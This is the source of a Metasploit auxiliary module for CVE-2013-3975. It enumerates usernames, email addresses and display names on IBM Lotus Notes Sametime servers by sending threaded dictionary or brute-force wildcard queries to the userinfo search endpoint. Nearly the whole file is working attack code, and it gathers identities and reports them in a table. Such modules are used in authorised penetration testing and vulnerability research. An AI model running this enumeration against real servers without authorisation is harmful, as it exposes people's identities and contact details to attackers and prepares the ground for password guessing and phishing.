## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'enumerable' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'IBM Lotus Notes Sametime User Enumeration', 'Description' => %q{ This module extracts usernames using the IBM Lotus Notes Sametime web interface using either a dictionary attack (which is preferred), or a bruteforce attack trying all usernames of MAXDEPTH length or less. }, 'Author' => [ 'kicks4kittens' # Metasploit module ], 'References' => [ [ 'CVE', '2013-3975' ], [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201'] ], 'DefaultOptions' => { 'SSL' => true }, 'License' => MSF_LICENSE, 'DisclosureDate' => 'Dec 27 2013' )) register_options( [ Opt::RPORT(443), OptString.new('TARGETURI', [ true, 'The path to the userinfo script', '/userinfo/search']), OptEnum.new('CHARSET', [true, 'Charset to use for enumeration', 'alpha', ['alpha', 'alphanum', 'num'] ]), OptEnum.new('TYPE', [true, 'Specify UID or EMAIL', 'UID', ['UID', 'EMAIL'] ]), OptPath.new('DICT', [ false, 'Path to dictionary file to use', '']), OptInt.new('MAXDEPTH', [ true, 'Maximum depth to check during bruteforce', 2]) ], self.class) register_advanced_options( [ OptString.new('SpecialChars', [false, 'Specify special chars (e.g. -_+!@&$/\?)', '' ]), OptString.new('PREFIX', [ false, 'Defines set prefix for each guess (e.g. user)', '']), OptString.new('SUFFIX', [ false, 'Defines set post for each quess (e.g. _adm)', '']), OptInt.new('TIMING', [ true, 'Set pause between requests', 0]), OptInt.new('Threads', [ true, 'Number of test threads', 10]) ], self.class) end def setup # setup the desired charset @charset = [] # setup array to hold user data @user_data = [] if datastore['DICT'].blank? # populate charset - lowercase only as search is case insensitive case datastore['CHARSET'] when "alpha" ("a".."z").each { |alpha| @charset.push(alpha) } when "num" ("0".."9").each { |num| @charset.push(num) } when "alphanum" ("a".."z").each { |alpha| @charset.push(alpha) } ("0".."9").each { |num| @charset.push(num) } end if datastore['SpecialChars'] datastore['SpecialChars'].chars do | spec | @charset.push(Rex::Text.uri_encode(spec)) end end print_status("#{peer} - Performing Bruteforce attack") vprint_status("#{peer} - Using CHARSET: [#{@charset.join(",")}]") else print_status("#{peer} - Performing dictionary based attack (#{datastore['DICT']})") end if datastore['DICT'].blank? and datastore['MAXDEPTH'] > 2 # warn user on long runs print_status("#{peer} - Depth level #{datastore['MAXDEPTH']} selected... this may take some time!") end # create initial test queue and populate @test_queue = Queue.new if datastore['DICT'].blank? @charset.each { |char| @test_queue.push(char) } else ::File.open(datastore['DICT']).each { |line| @test_queue.push(line.chomp) } vprint_status("#{peer} - Loaded #{@test_queue.length} values from dictionary") end @depth_warning = true @retries = [] end def run print_status("#{peer} - Testing for IBM Lotus Notes Sametime User Enumeration flaw") # test for expected response code on non-existant uid/email if datastore['TYPE'] == "UID" random_val = Rex::Text.rand_text_alpha(32) else random_val = Rex::Text.rand_text_alpha(32) +"@"+ Rex::Text.rand_text_alpha(16) + ".com" end res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'GET', 'ctype' => 'text/html', 'vars_get' => { 'mode' => datastore['TYPE'].downcase, 'searchText' => random_val } }) begin if res.nil? print_error("#{peer} - Timeout") return elsif res.code != 200 print_error("#{peer} - Unexpected response from server (Response code: #{res.code})") return elsif JSON.parse(res.body) # valid JSON response - valid response for check print_good("#{peer} - Response received, continuing to enumeration phase") end rescue JSON::ParserError, print_error("#{peer} - Error parsing JSON: Invalid response from server") return end # start test handler test_handler # ouput results output_results end def test_handler print_status("#{peer} - Beginning tests using #{datastore['TYPE']} search method (#{datastore['Threads']} Threads)") test_length = 1 # initial test length set until @test_queue.empty? t = [] nt = datastore['Threads'].to_i nt = 1 if nt == 0 if @test_queue.length < nt # work around issue where threads not created as the queue isn't large enough nt = @test_queue.length end begin 1.upto(nt) do t << framework.threads.spawn("Module(#{self.refname})-#{rhost}", false, @test_queue.shift) do |test_current| Thread.current.kill if not test_current # provide feedback to user on current test length if datastore['DICT'].blank? and test_current.length > test_length test_length = test_current.length print_status("#{peer} - Beginning bruteforce test for #{test_length} character strings") end res = make_request(test_current) # check response to see if an error was returned, if so wait 1 second and retry if res.nil? and not @retries.include?(test_current) # attempt test again as the server was too busy to respond # correctly - error returned print_error("#{peer} - Error reading JSON response, attempting to redo check for \"#{test_current}\"") @test_queue.push(test_current) @retries << test_current if @retries.length == 10 print_error("#{peer} - Excessive number of retries detected (#{@retries.length}... check the TIMING and Threads options)") end elsif res # check response for user data check_response(res, test_current) end end end t.each {|x| x.join } rescue ::Timeout::Error ensure t.each {|x| x.kill rescue nil } end end end # make request and return response def make_request(test_current) # combine test string with PRE and POST variables tstring = datastore['PREFIX'] + test_current + datastore['SUFFIX'] + "*" # Apply timing information to pause between making requests - not a timeout if datastore['TIMING'] > 0 Rex::sleep(datastore['TIMING']) end res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'GET', 'ctype' => 'text/html', 'vars_get' => { 'mode' => datastore['TYPE'].downcase, 'searchText' => tstring } }) end # check the response for valid user information def check_response(res, test_current) begin # check response exists AND that it validates as JSON before proceeding if res.code.to_i == 200 and not JSON.parse(res.body).blank? # successful response - extract user data extract_user(res) # extend test_queue to search for further data (not if dictionary in use) extend_queue(test_current) if (datastore['DICT'].blank?) end rescue JSON::ParserError # non-JSON response - server may be overloaded return error end end def extract_user(res) # extract user data if not already present begin userinfo = JSON.parse(res.body) unless @user_data.flatten.include?(userinfo['uid']) @user_data << [ userinfo['uid'], userinfo['mail'] || "-", userinfo['externalName'] || "-" ] # print newly discovered users straight to the screen if verbose mode is set vprint_good("#{peer} - New user found: #{userinfo['uid']}") report_user(userinfo['uid']) end rescue JSON::ParserError print_error("#{peer} - Error reading JSON string, continuing") end end # extend the test queue if MAXDEPTH value not exceeded # checks made to ensure duplicates are not created when extending # process: # # when a user is found searching for 'a' the queue for 'a' is extended as # only the first user starting with 'a' will be returned (e.g. 'aanderson') # To find all users the queue must be extended by adding 'aa' through to 'az' def extend_queue(test_current) if test_current.length < datastore['MAXDEPTH'] @charset.each do | char | @test_queue.push(test_current + char) end elsif @depth_warning and test_current.length == datastore['MAXDEPTH'] and datastore['MAXDEPTH'] > 1 vprint_status("#{peer} - Depth limit reached [#{datastore['MAXDEPTH']} levels deep] finishing up current tests") @depth_warning = false end end def report_user(username) report_note( :host => rhost, :port => rport, :proto => 'tcp', :sname => 'sametime', :type => 'ibm_lotus_sametime_user', :data => "#{username}", :update => :unique_data ) end def output_results # print output table user_tbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, 'Header' => "IBM Lotus Sametime Users", 'Prefix' => "\n", 'Indent' => 1, 'Columns' => [ "UID", "Email", "CommonName" ]) # populate tables @user_data.each do | line | user_tbl << [ line[0], line[1], line[2] ] end if not user_tbl.to_s.empty? print_good("#{peer} - #{@user_data.length} users extracted") print_line(user_tbl.to_s) else print_error("#{peer} - No users discovered") end end end